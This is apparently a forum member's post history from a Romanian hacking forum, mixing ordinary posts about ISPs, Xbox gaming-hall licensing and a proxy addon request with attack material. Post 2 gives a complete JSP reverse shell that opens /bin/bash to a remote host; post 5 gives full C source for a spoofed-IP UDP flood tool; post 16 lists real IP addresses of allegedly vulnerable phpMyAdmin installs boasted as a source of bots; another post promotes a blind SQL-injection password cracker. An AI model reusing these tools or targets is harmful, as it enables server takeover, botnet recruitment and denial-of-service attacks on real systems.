Jump to content

Eric

Active Members
  • Posts

    539
  • Joined

  • Last visited

  • Days Won

    4

Everything posted by Eric

  1. Eric

    ISP WorldWide

    Care vi se par cele mai bune isp-uri world wide? Ma refer la banda, peering etc. Nu doar din romania.....
  2. back.jsp <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <% class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector(InputStream is, OutputStream os) { this.is = is; this.os = os; } public void run() { BufferedReader isr = null; BufferedWriter osw = null; try { isr = new BufferedReader(new InputStreamReader(is)); osw = new BufferedWriter(new OutputStreamWriter(os)); char buffer[] = new char[8192]; int lenRead; while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) { osw.write(buffer, 0, lenRead); osw.flush(); } } catch (Exception ioe) { System.out.println("exception " + ioe.getMessage()); } try { if (isr != null) isr.close(); if (osw != null) osw.close(); } catch (Exception ioe) { System.out.println("exception " + ioe.getMessage()); } } } %> <h1>JSP Reverse Shell</h1> <p>Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process</p> <form method="get"> IP Address<input type="text" name="ipaddress" size=30 value="127.0.0.1"/> Port<input type="text" name="port" size=10 value="1234"/> <input type="submit" name="Connect" value="Connect"/> </form> <% String ipAddress = request.getParameter("ipaddress"); String ipPort = request.getParameter("port"); Socket sock = null; Process proc = null; if (ipAddress != null && ipPort != null) { try { sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); System.out.println("socket created: " + sock.toString()); Runtime rt = Runtime.getRuntime(); proc = rt.exec("/bin/bash"); System.out.println("process /bin/bash started: " + proc.toString()); StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream()); System.out.println("outputConnector created: " + outputConnector.toString()); StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream()); System.out.println("inputConnector created: " + inputConnector.toString()); outputConnector.start(); inputConnector.start(); } catch (Exception e) { System.out.println("exception " + e.getMessage()); } } if (sock != null && proc != null) { out.println("<div class='separator'></div>"); out.println("<p>Process /bin/bash, running as ("+ proc.toString()+", is connected to socket " + sock.toString() + ".</p>"); } %> <%@page import="java.lang.*"%> <%@page import="java.util.*"%> <%@page import=" - Pastebin.com
  3. Orice scuza se acuza, multumim pentru share symboss, noi stim ca esti baiat bun, nu te lua dupa comentariile inutile. Vorba aia: tine minte nite cuvinte, sursele te invata sa mergi inainte. sper ca ai vazut ca postul e din 2012, si meriti macar un warn ptr asta, emarketnew.
  4. Download: Download UnlimitedSocks_BETA.zip from Sendspace.com - send big files the easy way Am fixat bugurile cu redirect all process, stop al process si multe alte lucruri. Va logati in program, alegeti ip-ul si dati redirect all. Momentan oferim doar conturi demo, pentru a imbunatatii produsul. Daca dorinti conturi demo va rog sa imi dati un pm cu o cerere. De asemenea astept parelile voastre despre program.
  5. Download: Download sudp.zip from Sendspace.com - send big files the easy way Code: [C] #include <time.h> #include <pthread.h> #include <unistd.h> #include <stdio.h> - Pastebin.com #include <time.h> #include <pthread.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/udp.h> #define MAX_PACKET_SIZE 4096 #define PHI 0x9e3779b9 static uint32_t Q[4096], c = 362436; struct thread_data{ int throttle; int thread_id; unsigned int floodport; struct sockaddr_in sin; }; void init_rand(uint32_t x) { int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } uint32_t rand_cmwc(void) { uint64_t t, a = 18782LL; static uint32_t i = 4095; uint32_t x, r = 0xfffffffe; i = (i + 1) & 4095; t = a * Q[i] + c; c = (t >> 32); x = t + c; if (x < c) { x++; c++; } return (Q[i] = r - x); } char *myStrCat (char *s, char *a) { while (*s != '\0') s++; while (*a != '\0') *s++ = *a++; *s = '\0'; return s; } char *replStr (char *str, size_t count) { if (count == 0) return NULL; char *ret = malloc (strlen (str) * count + count); if (ret == NULL) return NULL; *ret = '\0'; char *tmp = myStrCat (ret, str); while (--count > 0) { tmp = myStrCat (tmp, str); } return ret; } /* function for header checksums */ unsigned short csum (unsigned short *buf, int nwords) { unsigned long sum; for (sum = 0; nwords > 0; nwords--) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return (unsigned short)(~sum); } void setup_ip_header(struct iphdr *iph) { iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(struct iphdr) + 1028; iph->id = htonl(54321); iph->frag_off = 0; iph->ttl = MAXTTL; iph->protocol = IPPROTO_UDP; iph->check = 0; // Initial IP, changed later in infinite loop iph->saddr = inet_addr("192.168.3.100"); } void setup_udp_header(struct udphdr *udph) { udph->source = htons(5678); udph->check = 0; char *data = (char *)udph + sizeof(struct udphdr); data = replStr("\xFF" "\xFF" "\xFF" "\xFF", 256); udph->len=htons(1028); } void *flood(void *par1) { struct thread_data *td = (struct thread_data *)par1; fprintf(stdout, "Thread %d started\n", td->thread_id); char datagram[MAX_PACKET_SIZE]; struct iphdr *iph = (struct iphdr *)datagram; struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr); struct sockaddr_in sin = td->sin; char new_ip[sizeof "255.255.255.255"]; int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); if(s < 0){ fprintf(stderr, "Could not open raw socket.\n"); exit(-1); } unsigned int floodport = td->floodport; // Clear the data memset(datagram, 0, MAX_PACKET_SIZE); // Set appropriate fields in headers setup_ip_header(iph); setup_udp_header(udph); udph->dest = htons(floodport); iph->daddr = sin.sin_addr.s_addr; iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); int tmp = 1; const int *val = &tmp; if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){ fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n"); exit(-1); } int throttle = td->throttle; uint32_t random_num; uint32_t ul_dst; init_rand(time(NULL)); if(throttle == 0){ while(1){ sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)); random_num = rand_cmwc(); ul_dst = (random_num >> 24 & 0xFF) << 24 | (random_num >> 16 & 0xFF) << 16 | (random_num >> 8 & 0xFF) << 8 | (random_num & 0xFF); iph->saddr = ul_dst; udph->source = htons(random_num & 0xFFFF); iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); } } else { while(1){ throttle = td->throttle; sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)); random_num = rand_cmwc(); ul_dst = (random_num >> 24 & 0xFF) << 24 | (random_num >> 16 & 0xFF) << 16 | (random_num >> 8 & 0xFF) << 8 | (random_num & 0xFF); iph->saddr = ul_dst; udph->source = htons(random_num & 0xFFFF); iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1); while(--throttle); } } } int main(int argc, char *argv[ ]) { if(argc < 5){ fprintf(stderr, "Invalid parameters!\n"); fprintf(stdout, "Spoofed UDP Flooder v2.5.3 FINAL by ohnoes1479\nUsage: %s <target IP/hostname> <port to be flooded> <throttle (lower is faster)> <number threads to use> <time (optional)>\n", argv[0]); exit(-1); } fprintf(stdout, "Setting up Sockets...\n"); int num_threads = atoi(argv[4]); unsigned int floodport = atoi(argv[2]); pthread_t thread[num_threads]; struct sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = htons(floodport); sin.sin_addr.s_addr = inet_addr(argv[1]); struct thread_data td[num_threads]; int i; for(i = 0;i<num_threads;i++){ td[i].thread_id = i; td[i].sin = sin; td[i].floodport = floodport; td[i].throttle = atoi(argv[3]); pthread_create( &thread[i], NULL, &flood, (void *) &td[i]); } fprintf(stdout, "Starting Flood...\n"); if(argc > 5) { sleep(atoi(argv[5])); } else { while(1){ sleep(1); } } return 0; }
  6. Eric

    Sala xbox

    Am gasit licente pentru comercial us la 10$ / joc. Ramane problema celor de la microsoft. Dar totusi ma gandesc, daca eu fac o sala de calculatoare, trebuie sa cer acordul celor de la intel ca am cumparat placi de baza de la ei ? Mi se pare o porcarie, si tind sa cred ca nici nu am nevoie de licenta de la ei atata timp cat am licentele la jocuri. Adica obtin licenta de la jocurile facute de microsoft pentru xbox dar nu imi dau licenta pentru consola ? Mega porcarie.... ceva scartaie si nu imi dau seama ce.
  7. Eric

    Sala xbox

    Aici voriam sa ajung, exista oare in legislatie acest punct? Pot sa percep o taxa / ora catre clubul meu ? Daca da, ce implica?
  8. ssh user@ip 'ls -al' aceeasi metoda se poate implementa si la telnet, chiar daca ne deconecteaza noi vom obtine output-ul, de aici ne putem da netcat si putem sa ne facem de cap, mai ales daca avem privilegiile necesare putem edita configul de la telnet si rezolva problema. Cel mai probabil asta este o setare din config-ul telnetului.
  9. Eric

    Sala xbox

    Va multumesc pentru idei, alte pareri ?
  10. Libertatea e mult prea scumpa pentru a fi traita in captivitate (sper sa se inteleaga ironia), pastreaza-ti statutul de pentester si nu te lasa influentat de pm-urile pe care le primesti cu "sa moara mama boss aici la noi, faci enspe mii de coco daca ai vulnu ala". Hall of fame-ul ajuta mult mai mult la cv. Exista o melodie pe undeva, si un simplu vers "mai bine sa iei bani decat ani", in continuare zic pastreaza atitudinea asta si nu te lasa influentat, valabil pentru tot rst-ul. Nu vreau sa fiu nici offtopic si nici sa o dau in etici morale cu voi, fiecare face ce vrea. Pana la urma care este profitul ?!
  11. Eric

    Sala xbox

    Multumesc pentru sfaturi, am sa le transmit si eu mai departe. Problema e alta, tipul se confrunta cu niste licente care par a fi de cacat in Romania, adica: - licenta pe sala - se obtine de la ORDA - licenta de activitate - se obtine de la ORDA - licenta pe consola - ???!!????!! - licenta pe jocuri - ???!!????!! Cand ma refer la licentele astea, tin sa precizez ca Microsoft Romania nu ofera astfel de licente pentru xbox 360, deoarece acesta practic nici nu exista in Romania. Licenta pentru jocuri nu inseamna cumparatul lor in original de la orice magazin, deoarece scrie clar pe cd ca nu ai voie sub nici o forma sa faci bani de pe urma lor. De aici reiese ca majoritatea salilor ori sunt pe naspa ori au importat licente din Germania, ori au gasit o portita in legislatie si pot functiona linistiti. Altfel salile mari din mall-uri nu ar exista. Ideea sta in felu urmator, cine s-a lovit de astfel de probleme sau cine are idee cu ce se mananca? Demersuri, etc... Tipu a intrebat pe la cativa avocati care dau din umeri. Stiu ca sunteti baieti destepti si va duce capu, speram sa gasesc niste solutii ortodoxe sau niste portite.
  12. Eric

    Sala xbox

    Nu investitia sau supravietuirea ar fi problema, nici nu vreau sa vorbesc despre asta, ma intereseaza mai mult discutiile legate de licente, ce implica, cine le da, sunt greu de obtinut, chestii de birocratie....
  13. Eric

    Sala xbox

    Nu prea ma intereseaza locatiile salilor, intreb doar daca a incercat cineva sa isi deschida ceva de genul asta in Romania si ce s-a intamplat cu afacerea, o mai are, nu o mai are ? A avut ceva probleme cu licentele ? Poate e un jurist pe aici care sa ne dea ceva detalii despre licentele alea...
  14. Eric

    Sala xbox

    A incercat cineva sa deschida o sala de console ? Daca da ce s-a intamplat cu ea, cand s-a intamplat asta ? Puteti da va rog cateva detalii ?
  15. Eric

    pma vuln list

    Inseamna ca stii sa te ascunzi bine. Ce-am gasit sa fie al tuturor! Adica esti cam nesimtit si stii tu de ce.
  16. pomana: r89x.com/vuln-pma.txt se ridica 3-400 boti. http://107.22.143.94/phpMyAdmin/scripts/setup.php http://107.22.15.208/phpmyadmin/scripts/setup.php http://107.22.15.208/phpMyAdmin/scripts/setup.php http://107.22.181.105/phpmyadmin/scripts/setup.php http://107.22.181.105/phpMyAdmin/scripts/setup.php http://107.22.181.236/phpmyadmin/scripts/setup.php http://107.22.181.72/phpmyadmin/scripts/setup.php http://107.22.184.186/phpmyadmin/scripts/setup.php http://107.22.184.186/phpMyAdmin/scripts/setup.php http://107.22.189.128/phpmyadmin/scripts/setup.php http://107.22.191.193/phpmyadmin/scripts/setup.php http://107.22.191.193/phpMyAdmin/scripts/setup.php
  17. sunt curios cat primesti. good job !
  18. VulnVPN (Vulnerable VPN) Solutions - Rebootuser
  19. SQLIer is a script that uses brute force to crack passwords through "true/false" SQL injection vulnerabilities. With "true/false" SQL injection vulnerabilities, you cannot actually query data out of the database, only ask a statement that is returned "true" or "false. SQLIer takes each character's ASCII code and asks a "higher/lower" question to the database, eventually reaching the actual character code. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites. An 8 character password (containing any character from decimal ASCII code 1-127) takes approximately 1 minute to crack. What's New in This Release: * This release removes the dependency on the "tempfile" command, which apparently is Debian/Debian-derivative specific. * It should now work on most GNU/Unix platforms. download: http://bcable.net/archive.php?sqlier-0.8.2b.sh source: nixbit.com
  20. Linux Bandwidth Arbitrator allows beginning-to-advanced network administrators to control bandwidth. It is designed to be completely turn-key in its default configuration. You just plug it into your network trunk, and it self configures and immediately starts slowing "bandwidth hogs". It can be configured to target specific applications such as Kazaa, IMAP, and POP. It is compatible with the 2.4.25 kernel, ebtables, and brouter (bridging router). It also comes with denial of service protection. Here are some key features of "Linux Bandwidth Arbitrator": * Default mode is turnke * Fully Redundant using Linux built-in Bridging * Plug it in, no administration needed* * Will automatically scale back heavy bandwidth users (such as p2p traffic) and "normal" users will see a 25 to 40 percent busy hour improvement for activities such as e-mail, chat, and web surfing. There is no need to do any administration, completely turnkey! * Unique implementation allows you to limit incoming Internet traffic * Arbitrator 3.x and up work fine with Netfilter on the same machine! * Automatically scales to Dial Up, DSL, T1, 40mbs * Determines your actual trunk speed and dynamically adjusts bandwidth limiting accordingly. What's New in This Release: * In this release, there is a new utility that allows a user to see how many connections are current for an existing IP address. * This will aid operators in deciding which users on their networks are candidates for a connection limit rule. download: http://www.bandwidtharbitrator.com/downloads/arbitrator9.62.tar.gz source: Linux Bandwidth Arbitrator 9.62 free download. Linux Bandwidth Arbitrator allows beginning-to-advanced network administrators to control bandwidth
  21. Eric

    VPN gratuit

    as fi interesat de o licenta pentru kerio mai degraba.
  22. Eric

    Addon Firefox

    Vreau un addon privat. Addon-ul trebuie sa fie legat de site-ul ipsocks.pro, ma intereseaza urmatoarele chestii: - vreau ceva asemanator: https://addons.mozilla.org/en-us/firefox/addon/elite-proxy-switcher/ - vreau optiunea de a alege socks-ul din platforma si de a-l schimba automat in firefox - vreau optiunea de a afisa socks-ul / tunnel-ul plain text - vreau informatii despre contul in ipsocks ( limite, cand expira contul, counturi, etc) - vreau sa parseze din platforma infomariile despre ip-uri ( un fel de scurtatura catre ssh-tunnels/socks ) + optiunea de a-l utiliza. - vreau grafic / monitorizare trafic pe socks-ul setat din platforma Caut unul sau mai multi baieti pentru dezvoltarea acestui addon, sunt deschis ideilor noi. Astept pareri si preturi. Nu ma intrebati cat ofer sa ce buget am. Accept versiuni care nu cuprind toate punctele specificate mai sus, pentru detalii si dezvoltare va rog sa imi dati un pm. Metode plata: WMZ, PM, PP, WU, Posta Romana. Nu raspund utilizatorilor care nu imi inspira incredere.
  23. da doamne un milion la aparate. I: Daca nu merge ./scan ce fac? R: rm -rf * Daca lu ala de deasupra nu i-a dat doamne doamne un milion la aparate, poate ii zici tu combinatia boss, nu? Esti prost? Ca aia din exterior! PS: http://www.cimitir.ro - tutorial ortodox
×
×
  • Create New...